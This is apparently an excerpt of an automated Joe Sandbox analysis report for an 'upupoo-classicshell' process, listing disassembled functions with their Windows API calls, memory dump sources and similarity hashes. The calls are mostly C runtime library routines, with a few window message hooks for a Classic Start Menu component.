                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$HookPostUnhookWindows$File@@QuitRegisterSleepTimerWindow
                                                                                                              • String ID: ClassicStartMenu.StartMenuMsg
                                                                                                              • API String ID: 2850628872-1923710789
                                                                                                              • Opcode ID: af02a80655f7bc13cf0909cacda0fa45b74ceaecece0bffd2605e256841a014a
                                                                                                              • Instruction ID: a939d5a85fb2e02d9ead71e08ebf5b695db79fc02a464bcf02da07f00cbddd3d
                                                                                                              • Opcode Fuzzy Hash: af02a80655f7bc13cf0909cacda0fa45b74ceaecece0bffd2605e256841a014a
                                                                                                              • Instruction Fuzzy Hash: 94317CB52143429FD710DF24E964B2BB3E5EB95B01F048818F551CB6A1C7B6DE84CB72
                                                                                                              Function 1000AF6A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,1000B6DF,?,00000000,?,00000000,00000000), ref: 1000AFAC
                                                                                                              • __fassign.LIBCMT ref: 1000B027
                                                                                                              • __fassign.LIBCMT ref: 1000B042
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1000B068
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,1000B6DF,00000000,?,?,?,?,?,?,?,?,?,1000B6DF,?), ref: 1000B087
                                                                                                              • WriteFile.KERNEL32(?,?,00000001,1000B6DF,00000000,?,?,?,?,?,?,?,?,?,1000B6DF,?), ref: 1000B0C0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: 690a3027da326de177d2d59d2ea2b163b808028bb59637e7210ba7f7deaf4494
                                                                                                              • Instruction ID: 33e939531d0a515d7d24f719cc679a4440ea9898e460d19b4a1d97a9964afaa8
                                                                                                              • Opcode Fuzzy Hash: 690a3027da326de177d2d59d2ea2b163b808028bb59637e7210ba7f7deaf4494
                                                                                                              • Instruction Fuzzy Hash: 2751C170E106499FEB10CFA8DC95AEEBBF8FF09340F11415AE951E7295D670E981CBA0
                                                                                                              Function 6E0B6CBF Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6E0B7434,?,00000000,?,00000000,00000000), ref: 6E0B6D01
                                                                                                              • __fassign.LIBCMT ref: 6E0B6D7C
                                                                                                              • __fassign.LIBCMT ref: 6E0B6D97
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6E0B6DBD
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,6E0B7434,00000000,?,?,?,?,?,?,?,?,?,6E0B7434,?), ref: 6E0B6DDC
                                                                                                              • WriteFile.KERNEL32(?,?,00000001,6E0B7434,00000000,?,?,?,?,?,?,?,?,?,6E0B7434,?), ref: 6E0B6E15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: c67915cf4f17000c31cbc0542c8cd4d9f21cde83154aac9709970bc4e1705c17
                                                                                                              • Instruction ID: d52bf908a1dc0f782c6ed401f190e43969b29f073918ab2d06e4d7432b50dcad
                                                                                                              • Opcode Fuzzy Hash: c67915cf4f17000c31cbc0542c8cd4d9f21cde83154aac9709970bc4e1705c17
                                                                                                              • Instruction Fuzzy Hash: 5B51AE71A10249AFDB10CFE8D895BEEBBF8FF19704F10451AE965E7281E731A941CB60
                                                                                                              Function 00C21791 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00C2181F
                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00C21834
                                                                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00C21849
                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00C21864
                                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 00C21876
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Long$CallProc
                                                                                                              • String ID: $
                                                                                                              • API String ID: 513923721-3993045852
                                                                                                              • Opcode ID: 2eb927511f1d53d8a0f1eafc1fa77763247f1d681855b0d8a8415eec0f782e1e
                                                                                                              • Instruction ID: e4b0896c6f87521c36fe920c6d7826f080e0ffb1e98e669c7f5b7f5054b139e3
                                                                                                              • Opcode Fuzzy Hash: 2eb927511f1d53d8a0f1eafc1fa77763247f1d681855b0d8a8415eec0f782e1e
                                                                                                              • Instruction Fuzzy Hash: 384107B1608710AFC328DF19D88491BFBF8FF98710F148A1DF5AA876A1D731E9418B91
                                                                                                              Function 1000AD35 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 1000ACF9: _free.LIBCMT ref: 1000AD22
                                                                                                              • _free.LIBCMT ref: 1000AD83
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 1000AD8E
                                                                                                              • _free.LIBCMT ref: 1000AD99
                                                                                                              • _free.LIBCMT ref: 1000ADED
                                                                                                              • _free.LIBCMT ref: 1000ADF8
                                                                                                              • _free.LIBCMT ref: 1000AE03
                                                                                                              • _free.LIBCMT ref: 1000AE0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 2882d0eb60e70101d5ce44f11dd15c658c3f2d9149b540b32ac8b62c3af22bd9
                                                                                                              • Instruction ID: faa8de974e089025a9ff2a2335d9aa5c3d9e3b3ca956ec36e4031fb07d0a6f9e
                                                                                                              • Opcode Fuzzy Hash: 2882d0eb60e70101d5ce44f11dd15c658c3f2d9149b540b32ac8b62c3af22bd9
                                                                                                              • Instruction Fuzzy Hash: 9D11B135940B04EBF930EBB0CC07FCB77ADEF01380F400925B69D66156CA3AB4C59640
                                                                                                              Function 6E0B47AE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 6E0B4772: _free.LIBCMT ref: 6E0B479B
                                                                                                              • _free.LIBCMT ref: 6E0B47FC
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B4807
                                                                                                              • _free.LIBCMT ref: 6E0B4812
                                                                                                              • _free.LIBCMT ref: 6E0B4866
                                                                                                              • _free.LIBCMT ref: 6E0B4871
                                                                                                              • _free.LIBCMT ref: 6E0B487C
                                                                                                              • _free.LIBCMT ref: 6E0B4887
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: ab63de39dd25b907716cb31e48b2361037be5e45d13f7649d304b11a5864194d
                                                                                                              • Instruction ID: 84b5682a38803b0d3a44520606975e33749a34a8ccf33a8fb010be54c5867e5e
                                                                                                              • Opcode Fuzzy Hash: ab63de39dd25b907716cb31e48b2361037be5e45d13f7649d304b11a5864194d
                                                                                                              • Instruction Fuzzy Hash: 5C110A71585B04FAD661ABF0CC45FCF779CBF06704F804C15A3AEA7150EB76AA06C691
                                                                                                              Function 10006256 Relevance: 10.5, APIs: 7, Instructions: 48COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,00000000,10005FDE,1000421C,10003C4C,?,10003E49,?,00000001,?,?,00000001,?,100146E0,0000000C,10003F52), ref: 10006264
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10006272
                                                                                                              • SetLastError.KERNEL32(00000000,10003E49,?,00000001,?,?,00000001,?,100146E0,0000000C,10003F52,?,00000001,?), ref: 1000627F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$Value___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 483936075-0
                                                                                                              • Opcode ID: 4134c441ff1b667284df0a9e97644d1263a5e8bc091f1a2139e204116331b238
                                                                                                              • Instruction ID: 040005f3ee799f5f55fdc0611c9e5094b79c9a1cc234f665cd1c30559a2954a5
                                                                                                              • Opcode Fuzzy Hash: 4134c441ff1b667284df0a9e97644d1263a5e8bc091f1a2139e204116331b238
                                                                                                              • Instruction Fuzzy Hash: 34F0C83AA499319BF212D734AC49A6F2AA6EB8DBF17310119F904D619DDF204C02A2D0
                                                                                                              Function 6E0ABAA4 Relevance: 10.5, APIs: 7, Instructions: 48COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,00000000,6E0AB8B8,6E0A8DEC,6E0A86D2,?,6E0A88CF,?,00000001,?,?,00000001,?,6E0C3B08,0000000C,6E0A89D8), ref: 6E0ABAB2
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E0ABAC0
                                                                                                              • SetLastError.KERNEL32(00000000,6E0A88CF,?,00000001,?,?,00000001,?,6E0C3B08,0000000C,6E0A89D8,?,00000001,?), ref: 6E0ABACD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$Value___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 483936075-0
                                                                                                              • Opcode ID: b70f5e3904d122e0f0c50b26b4c7df85b947708489d31745cbf0f5c3195978e0
                                                                                                              • Instruction ID: a8f6849b28b63ad08c9460b591a4fcaffc9275a9903ca0017dbc68281eb1950b
                                                                                                              • Opcode Fuzzy Hash: b70f5e3904d122e0f0c50b26b4c7df85b947708489d31745cbf0f5c3195978e0
                                                                                                              • Instruction Fuzzy Hash: 4EF0F936519A195B862116FDAC4C7BF36B8FB87BB57110114F6149618DDF7148024F94
                                                                                                              Function 6E0ACB60 Relevance: 9.3, APIs: 6, Instructions: 275COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 6E0ACC70
                                                                                                              • __FindPESection.LIBCMT ref: 6E0ACC8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                                              • String ID:
                                                                                                              • API String ID: 876702719-0
                                                                                                              • Opcode ID: 259002e11f90dda2798d6b0440bff852f3a75d94c9f529e8b29147c60574de7a
                                                                                                              • Instruction ID: 52f29ad692e8f77cbbcc393072647de7299b1848e637edec226d95a640d7eae1
                                                                                                              • Opcode Fuzzy Hash: 259002e11f90dda2798d6b0440bff852f3a75d94c9f529e8b29147c60574de7a
                                                                                                              • Instruction Fuzzy Hash: 63A18972A1061A8FDB00CFECC9C0799B7F4FB497A4F564629DA55AF242D732E800CB91
                                                                                                              Function 1000A30B Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,1000A55C,?,?,00000000), ref: 1000A365
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1000A55C,?,?,00000000,?,?,?), ref: 1000A3EB
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,1000A55C,?,?,00000000,?), ref: 1000A4E5
                                                                                                              • __freea.LIBCMT ref: 1000A4F2
                                                                                                                • Part of subcall function 10007DA2: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,1000A5BB,00000001,00000000,?,10009255,00000001,00000004,00000000,00000001,?,?,10007A89), ref: 10007DD4
                                                                                                              • __freea.LIBCMT ref: 1000A4FB
                                                                                                              • __freea.LIBCMT ref: 1000A520
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3147120248-0
                                                                                                              • Opcode ID: 75faa58704443a65e114674e4f19ec9264a70c7a7f1dc76a712b73558287d04c
                                                                                                              • Instruction ID: 347cb34858b265d0a76abfe4a5d63416f6ba46da913f435053f86f0fa170bd29
                                                                                                              • Opcode Fuzzy Hash: 75faa58704443a65e114674e4f19ec9264a70c7a7f1dc76a712b73558287d04c
                                                                                                              • Instruction Fuzzy Hash: 0351CF76610216AFFB15CF64CC85EAF37A9EB866D0B114329FD04DA148EB74EDC0D6A0
                                                                                                              Function 6E0B49CF Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,6E0B4C20,?,?,00000003), ref: 6E0B4A29
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,?,?,6E0B4C20,?,?,00000003,?), ref: 6E0B4AAF
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000003,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E0B4BA9
                                                                                                              • __freea.LIBCMT ref: 6E0B4BB6
                                                                                                                • Part of subcall function 6E0B0F23: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6E0B6A46,00000001,00000000,?,6E0B3B91,00000001,00000004,00000000,00000001,?,?,6E0B0869), ref: 6E0B0F55
                                                                                                              • __freea.LIBCMT ref: 6E0B4BBF
                                                                                                              • __freea.LIBCMT ref: 6E0B4BE4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3147120248-0
                                                                                                              • Opcode ID: 91667d5b901e93a2eec2902f796d4528edc6942f979d1750bce99f033b23270e
                                                                                                              • Instruction ID: 1527a4f8399e4bbc4237d415855f827ce71e8f02ce074030e7634a85b92716ad
                                                                                                              • Opcode Fuzzy Hash: 91667d5b901e93a2eec2902f796d4528edc6942f979d1750bce99f033b23270e
                                                                                                              • Instruction Fuzzy Hash: 6751BC72A10216BFEB258EE4CC91FAB77E9FB44794B104668EE14D7140EB36DE4186A0
                                                                                                              Function 100082B1 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: 5b153be5527101a79d58557ca9c73faddc413b6f7d812d4d626c0dc657012eaf
                                                                                                              • Instruction ID: ff87b2143ae6c1074eaeb520f825daac95a71dcd6feda4857c1337ed75f1108c
                                                                                                              • Opcode Fuzzy Hash: 5b153be5527101a79d58557ca9c73faddc413b6f7d812d4d626c0dc657012eaf
                                                                                                              • Instruction Fuzzy Hash: BBF0C839944A1267F212D3349C4AF2B25A9FFC5AE1B220129F698D329FEF349B025355
                                                                                                              Function 6E0B163B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000008,?,6E0B3FFA,?,?,?,?,?,?,?,?,?,?,6E0A9806,?), ref: 6E0B163F
                                                                                                              • _free.LIBCMT ref: 6E0B1672
                                                                                                              • _free.LIBCMT ref: 6E0B169A
                                                                                                              • SetLastError.KERNEL32(00000000,6E0B0C25,00000016,6E0B3214), ref: 6E0B16A7
                                                                                                              • SetLastError.KERNEL32(00000000,6E0B0C25,00000016,6E0B3214), ref: 6E0B16B3
                                                                                                              • _abort.LIBCMT ref: 6E0B16B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: a44e3140f421e5140d5c3cda6169684437b6008298f6fcb430c2f55b7957f706
                                                                                                              • Instruction ID: 2700452414fef13744d50343e6838f75010817b79ab90d706241e7f97fb1288e
                                                                                                              • Opcode Fuzzy Hash: a44e3140f421e5140d5c3cda6169684437b6008298f6fcb430c2f55b7957f706
                                                                                                              • Instruction Fuzzy Hash: 19F0A931518A02ABC65112F59C58F9F25ADBFC27A5B150515F928E7185FF338C464138
                                                                                                              Function 00C283CA Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00C283F2
                                                                                                                • Part of subcall function 00C253B6: __getptd.LIBCMT ref: 00C253C4
                                                                                                                • Part of subcall function 00C253B6: __getptd.LIBCMT ref: 00C253D2
                                                                                                              • __getptd.LIBCMT ref: 00C283FC
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C2840A
                                                                                                              • __getptd.LIBCMT ref: 00C28418
                                                                                                              • __getptd.LIBCMT ref: 00C28423
                                                                                                              • _CallCatchBlock2.LIBCMT ref: 00C28449
                                                                                                                • Part of subcall function 00C2545B: __CallSettingFrame@12.LIBCMT ref: 00C254A7
                                                                                                                • Part of subcall function 00C284F0: __getptd.LIBCMT ref: 00C284FF
